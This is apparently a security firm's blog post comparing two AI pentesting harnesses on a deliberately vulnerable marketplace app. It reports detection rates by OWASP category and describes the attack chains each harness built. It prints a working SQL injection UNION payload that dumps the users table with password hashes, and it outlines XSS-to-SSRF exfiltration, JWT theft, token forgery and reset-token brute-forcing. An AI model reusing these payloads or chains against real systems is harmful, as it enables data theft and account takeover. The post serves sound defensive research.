How Good Are AI Agents at Finding Web Vulnerabilities (Part 3)

We gave two AI pentesting harnesses the same model, the same target, and the same vulnerabilities. They came back with very different…

Tuomo Makkonen

Fraktal

· ~13 min read · April 29, 2026 (Updated: April 29, 2026) · Free: Yes

We gave two AI pentesting harnesses the same model, the same target, and the same vulnerabilities. They came back with very different answers. The one that did better didn't have a smarter brain. It had a human who read the room first.

In Part 1 and and Part 2 we tested solo AI coding agents against HireFlow, our vulnerable freelancer marketplace. They found real bugs with zero false positives but missed entire vulnerability classes and never chained findings together. That gave us a feel for the baseline capability: good at local reasoning, bad at coverage and composition.

This post looks at the next step up: multi-agent harnesses on top of the same base model. With the model held constant, how much does the harness around it actually matter?

We compare two harnesses, both running Claude Opus 4.6 under the hood:

Shannon: an open-source autonomous web pentesting tool (~37.5k GitHub stars). Multi-agent pipeline of five specialists (authentication, injection, XSS, SSRF, authorization). Scored 96.15% on the XBOW benchmark in hint-free source-aware mode.
Webagent: a custom Claude Code harness we built for this experiment. Ten specialists, one per OWASP Top 10:2025 category, plus a dedicated PoC/validation agent that hunts for cross-category attack chains. Roughly 20 files of prompts and config, built with Claude Code.

We used the same target, with the same 47 planted vulnerabilities, same live application, same level of access (source code + running instance), same base model. The only variable is the harness.

In this article we'll walk through the scoreboard, the per-category breakdown that explains it, where each harness is strongest, and what the gap means for how to design a pentest harness.

Harnesses side-by-side

Harness feature comparison

Both harnesses use the same core idea: break the problem into specialist agents running in parallel, each prompted for a narrow slice of the attack surface. The meaningful difference is what slice each specialist owns.

The scoreboard

As before, the reports and other deliverables produced by both harnesses can be found in the GitHub repo. The repo also has the full Webagent harness.

Scoreboard

Twenty-five percentage points between two multi-agent harnesses running the same base model. That's a much larger gap than single-harness architectural differences usually produce. The rest of this post explains where it came from.

Both harnesses produced exactly one false positive, and they were essentially the same one: a MongoDB injection pattern in the gig search endpoint that matches a textbook NoSQL injection but isn't exploitable because MongoDB 7 disables JavaScript execution by default. Shannon explicitly labelled it FALSE POSITIVE in its own report. Webagent's A05 specialist set confidence to suspected and documented the mitigation. Whether "real vulnerable code mitigated by the database engine's current default config" counts as a finding is a genuine judgement call; both harnesses made the honest call.

Detection by OWASP category

This is the chart that matters:

Three of Shannon's row entries are 0%. Those three categories are precisely the ones that don't map onto Shannon's five attack-technique specialists. Shannon has no specialist whose job is to look into pipeline config files, grep for missing log statements, or to send concurrent requests to probe for race conditions.

Webagent's carve-up (the way the problem space is divided across specialists) is different. It has exactly one specialist per OWASP category. The A03 specialist's entire job is CI/CD and dependency review. The A09 specialist does absence-detection, enumerating security-relevant events, check whether each is logged. The A10 specialist actively races every state-mutating endpoint. Those three specialists alone account for 9 of Webagent's 12-vuln advantage over Shannon.

The model is used by both tools is the same, meaning the reasoning capability of both tools is identical. The difference is that Webagent has someone pointed at those categories, and Shannon doesn't.

What Shannon does well

Detection rate is one axis. Depth of exploitation is another, and Shannon is the stronger tool on this one. Where Webagent tends to confirm a vulnerability and move on, Shannon keeps pulling on the thread until it has a complete, weaponized exploit chain. Three examples make the difference concrete.

Deeper exploitation payloads

Shannon doesn't stop at "this field is injectable." It produces clean end-to-end exploitation steps, often with working payloads and live confirmation.

SQL injection. Shannon crafted a UNION SELECT payload for the SQL injection in users.service.js:33 that dumped the entire users table in a single request. That's 120 rows including usernames, emails, and bcrypt hashes. It understood the three-column ILIKE injection context and the wrapping subquery that breaks standard --comment termination, then built a payload that closes the ILIKE pattern and injects a full UNION SELECT with matching column types:

GET /api/users?search=x') UNION SELECT id,username,email,role,password_hash,bio,location,skills,created_at FROM users WHERE (1=1 OR username ILIKE 'x

Two-stage data exfiltration. For the HTML injection in the invoice PDF generator, Shannon built a multi-step chain:

Store a JavaScript SSRF payload in the user's biofield
Set display_name to a 138-character loader script that fetches the bio and eval()'s it
Trigger invoice PDF generation; Puppeteer renders the HTML, executes the loader, fetches and executes the full SSRF payload
The payload does afetch() to an internal service, writes the response data back to the attacker's profile via the app's API
Attacker reads the exfiltrated data from their own profile Shannon confirmed the attack by comparing PDF file sizes between normal and injected invoices (24,674 vs 27,529 bytes, the additional DOM elements from executed JavaScript produced measurably larger output).

Full JWT theft using XSS with browser proof. Shannon used Playwright to simulate a victim visiting the gig page, showed that the injected <script>executes in the victim's browser, extracted the JWT from localStorage, and used the stolen JWT to authenticate as the victim — full account takeover chain end-to-end, in a real browser.

Authorization depth

Shannon reported 18 authorization findings. Its authz specialist systematically enumerated every CRUD operation on every resource type (see AUTHZ-VULN-02 to AUTHZ-VULN-09 in the report). That's eight authorization failures on a single resource type, plus a chain that uses them together: submit a fake deliverable on someone else's milestone → approve it as a different unrelated user → financial disbursement triggered without the contract owner's involvement.

Webagent caught all of these too (via its A01 specialist, which got prompted to enumerate per-resource × per-operation similarly), but Shannon's authz work was clearly the output of a specialist whose sole job was thoroughness on that category. It shows what tight category prompting can do.

Infrastructure testing

Shannon port-scanned the target and found PostgreSQL (5432), MongoDB (27017), and Redis (6379) directly accessible without authentication. It probed MailHog at port 8025 and used it to steal a superadmin's password reset token for a full account takeover. Webagent's A02 specialist covers the same ground (this was an explicit prompt choice after surveying Shannon's output), but Shannon showed this surface matters.

What Webagent Does Well

The "hard ceiling" categories

Three OWASP categories defeated every agent in Parts 1 and 2 and continue to defeat Shannon: A03 (supply chain), A09 (logging and monitoring), and A10 (exceptional conditions). These aren't harder vulnerabilities in the reasoning sense. They're harder to find, because finding them means looking somewhere most agents don't look: CI/CD config files, the absence of log statements, and the timing windows around state-mutating endpoints. Webagent broke through all three.

A03 Supply Chain: 0% → 100%. The A03 specialist reads package.json, Dockerfile etc. and cross-references concrete CVEs against resolved package versions. It flagged npm install instead of npm ci, continue-on-error: true on npm audit, and CVEs in jsonwebtoken, multer, mongoose, and puppeteer.
A09 Logging: 0% → 80%. The A09 specialist does absence-detection as its primary mode. Its prompt explicitly says: "enumerate security-relevant events that should be logged, then check whether each one is." It found missing auth-event logging, cleartext passwords in error-handler req.body logging, missing alerting infrastructure, and log injection via unsanitized email.
A10 Exceptional Conditions: 0% → 40%. The A10 specialist actively races every state-mutating endpoint. It caught wallet withdraw, escrow fund, and escrow release TOCTOUs, all confirmed with live concurrent-request reproduction, driving the wallet to a negative balance.

A few individual findings are worth calling out:

Session fixation (A07-E04): Shannon found this one too, but every solo agent missed it. Webagent's A07 specialist catches it.
JWT aud/iss validation missing (A07-E06): Shannon missed this. Webagent's A07 specialist explicitly checks for algorithm pinning and claim validation in jwt.verify calls.
CDN script loaded without Subresource Integrity (A08-E01): Shannon missed this. Webagent caught it in three independent specialists (A02, A03, A08) and chained it into a supply-chain compromise path.
Predictable reset token algorithm: Shannon noted that tokens weren't invalidated after use, which is real but different. Webagent reconstructed the token generation algorithm and brute-forced a live admin takeover in roughly 2,000 candidate millisecond values, with no email access required.

Chain-aware validation

The biggest qualitative difference is Webagent's PoC validator, a sequential agent that runs after all specialists complete. Its explicit task was to think in terms of attack paths, not individual findings. It produced five live-verified end-to-end chains:

Chain A: Hardcoded JWT secret. Forge a superadmin token, get full admin panel access including audit log read and platform settings write. Unauthenticated full compromise. Reproduction is four lines of bash.
Chain B: Predictable reset token. Blind brute-force takes over bob.admin@hireflow.com with no email access and no user interaction. One script, runs in about 90 seconds.
Chain C: Payment webhook with absent signature. The webhook handler uses if (signature) as a guard rather than asserting the signature is present, so any user can credit any wallet any amount unauthenticated. No idempotency check, so replays multiply the credit. Live demo: credited a freelancer wallet 100,000 cents in two network round-trips.
Chain D: Stored XSS to persistent account takeover. Inject a payload that reads localStorage.getItem('hf_token') into the document title, steal the JWT, authenticate as the victim. JWT remains valid after the victim logs out, so the takeover is persistent.
Chain E: CDN supply-chain risk. lodash loaded from cdnjs without Subresource Integrity, no CSP, JWT readable from JS. Any future CDN compromise silently owns every HireFlow session.

Shannon assembled one multi-step chain (the milestone financial manipulation chain mentioned earlier). Webagent's PoC validator systematically combined findings from every category into goal-oriented attack paths: "full account takeover," "mass financial fraud," "persistent access," "privilege escalation." Its prompt explicitly lists attacker goals and a set of composition heuristics ("XSS + no httpOnly on session + JWT in localStorage = critical takeover") so it won't leave obvious chains on the table.

What Webagent still missed

Seven planted vulns slipped through, and the pattern is the same across all of them: a file or endpoint the relevant specialist didn't open. Two injection variants on admin endpoints (the A05 specialist found the public SQLi and stopped there). One SSRF vector flagged in recon but never probed. One logging gap in a file the auth specialist had touched for a different finding. Three exceptional-conditions bugs in the disputes and analytics modules that no specialist opened.

Every miss is due to coverage, not reasoning. Fixing them is a matter of more exhaustive per-endpoint enumeration within each category, possibly via a coverage-audit step after specialist dispatch. It's not a new capability requirement.

Both harnesses have real coverage limitations. Shannon's were structural: entire categories with no specialist pointed at them. Webagent's are tactical: files and endpoints the relevant specialist didn't open. The structural gaps are worse, but the tactical ones are still real.

Webagent even produced screenshots of some of the findings.

Lessons learned

The harness should be configured per engagement, not fixed per tool. We initially thought Webagent's target-informed prompts were a problem, that we'd overfit to HireFlow. But that's just what a pentester does at the start of any engagement. They look at the stack, work out which categories and techniques apply, and build a test plan from there. Calling that overfitting is calling competence cheating.

Shannon represents the alternative: one fixed pipeline, applied identically to every target. That's the scanner model: broad, automated, no per-engagement customization, and it scores around ~60%. Webagent represents the pentest model: a methodology template configured by a human who understands the target before the AI executes. Two hours of prompt curation (reviewing the stack, selecting relevant checks, framing each specialist's task) buys 25 detection-rate percentage points.

It follows that the senior pentester's job doesn't disappear, it shifts. Less time executing tests, more time configuring the harness: which methodology applies, which attack techniques fit this stack, what an absent log statement looks like in this framework, which workflows could race. Those are scoping decisions that need human judgment about the target. The model handles everything downstream: reading code, crafting payloads, confirming exploitation, assembling chains.

Chain-aware validation is the difference between a bug list and an attack plan. Shannon produces a vulnerability inventory. Webagent's PoC validator produces attack paths. Both are useful and they're different products. The PoC validator isn't expensive to build or run, and it changes the output from "list of issues" to "ways an attacker actually compromises the target." It assembled three of five chains a human pentester would write, missed two obvious compositions, and found two the human didn't think of. Not perfect, but a category shift from anything in Parts 1 or 2.

The Bitter Lesson, applied. Rich Sutton's Bitter Lesson predicts that general methods leveraging computation outperform hand-engineered domain expertise. Shannon's result is consistent: elaborate domain-specific scaffolding on a general-purpose model didn't did not significantly improve the results compared to the raw model. Shannon's specialists duplicate what the model already does spontaneously: test injection, auth, XSS, authz. The scaffolding tries to outthink the model, and the model doesn't need the help.

Webagent's +25 points looks like a contradiction but isn't. Webagent doesn't replace the model's reasoning with engineered heuristics. It aims the model: choosing which files to open, which categories to audit, which questions to ask. The model does all the actual reasoning once pointed at the right target. The Bitter Lesson holds: invest in model quality, not in replacing model reasoning with scaffolding. But deciding what to compute remains the human's job. A thin layer that does that well is worth 25 percentage points on the same model.

This maps cleanly onto domains that uses AI: the model is general-purpose, and the human provides task-specific direction. Nobody expects a coding agent to know which feature to build without a spec. A pentest agent shouldn't be expected to know which categories to audit without a test plan.

Objections

"Webagent was designed to ace this specific benchmark." Partly true. We reviewed HireFlow's stack, picked the OWASP categories that applied, and chose testing techniques relevant to Node.js, Express, and React. The specialist prompts themselves contain only standard OWASP and WSTG methodology — no HireFlow-specific file paths, no planted-vuln hints, no endpoint names. But the selection of which standard techniques to include was informed by understanding the target. A genuinely blind prompt set would likely include most of the same checks (they're standard for this stack) but not all, and would include others that don't apply. The detection rate on a blind run would be somewhat lower; how much lower is an open question we haven't measured.

The honest version of this objection is "the 25-point gap reflects two hours of human scoping work, not just harness design." That's correct, we argue that it's the post's central finding rather than a weakness. A human pentester does this scoping at the start of every engagement. Shannon doesn't, which is the comparison.

"Shannon wasn't designed for OWASP Top 10." True, Shannon was designed for general web pentesting and optimized for the XBOW benchmark, where it scores 96%. Every tool is optimized for something. The comparison isn't "which tool is better" but "what's the value of configuring a harness per engagement vs. running a fixed pipeline?" Shannon represents the scanner model, and Webagent represents the pentest model. Both are legitimate, they just serve different use cases.

To be fair, Shannon supports per-engagement customization too, and we ran it in its default configuration rather than tuning it for HireFlow. A customized Shannon would close some of the gap, possibly a lot of it. The comparison isn't "Webagent's architecture beats Shannon's." It's "two hours of target scoping beats none, on the same base model." If you customized Shannon for HireFlow with the same scoping work, you'd likely see a similar jump.

"So the +25 points is just benchmark overfitting?" Partly true. But OWASP Top 10 isn't an arbitrary scorecard. It's the industry-standard taxonomy for real web application risk. If a pentest tool doesn't cover supply chain, logging, or error handling, those are genuine blind spots in real engagements, not just missed benchmark points. Shannon genuinely doesn't open CI/CD workflow files, and no amount of model quality fixes that. The blind spots Webagent closes are real even if the way we found them was post-hoc.

"Single runs aren't enough though! What about variance?" Fair point. We ran each harness once. LLM agent results are stochastic, and the 25-point gap could narrow or widen across multiple runs. Our subjective sense from running the agents during development is that the per-category coverage gaps (Shannon's 0% on A03, A09, A10) are structural rather than stochastic. Shannon doesn't have a specialist that opens CI/CD files, so no amount of re-running fixes that. The gap on categories Shannon does cover is more likely to vary run-to-run. We didn't measure this.

Our honest summary is this: configuring a harness per engagement, on the same base model, is worth roughly 25 detection points against a default-configured competitor on the OWASP Top 10. Some of that gap is scoping, some is the PoC validator, some is structural coverage of categories the competitor doesn't touch. The interesting result isn't which tool won, but that the win came from human scoping work upstream of the model, not from architectural sophistication around it.

#artificial-intelligence #cybersecurity #application-security #ai-agent

< Go to the original